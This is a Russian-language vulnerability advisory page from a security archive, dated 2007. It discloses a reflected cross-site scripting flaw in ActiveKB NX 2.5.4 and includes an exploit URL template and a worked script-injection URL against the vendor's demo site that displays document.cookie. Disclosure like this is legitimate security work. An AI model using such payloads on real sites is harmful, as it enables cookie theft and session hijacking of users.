Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Aria-Security Team] social-networkin SQL Injection

  NuclearBB Alpha 2 Remote File Inclusion

  Husrev Forums v2.0.1:PoWerBoard Sql

  Proxy Anket v3.0.1 Sql injection Vulnerable

From:durito <durito_(at)_mail.ru>
Date:11 сентября 2007 г.
Subject:XXS в ActiveKB NX 2.5.4

Здравствуйте, 3APA3A.

Software:   ActiveKB NX 2.5.4
Vendor:  www.interspire.com
Vulnerability: XXS
Risk:  низкий
Date:  1.09.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP:       durito.narod.ru

                        
+~~~:| Details |:

Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы.

+~~~:| Экплойт |:

http://www.target.com/activekb/ActiveKB/?page=[XXS]


+~~~:| Пример |:

http://www.interspire.com/activekb/demo/default/categories/ActiveKB/?page=%3C
script%3Ealert
(document.cookie);%3C/script%3E  

--
С уважением,
durito [NGH Group]                 mailto:[email protected]
http://durito.narod.ru
http://ngh.void.ru

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород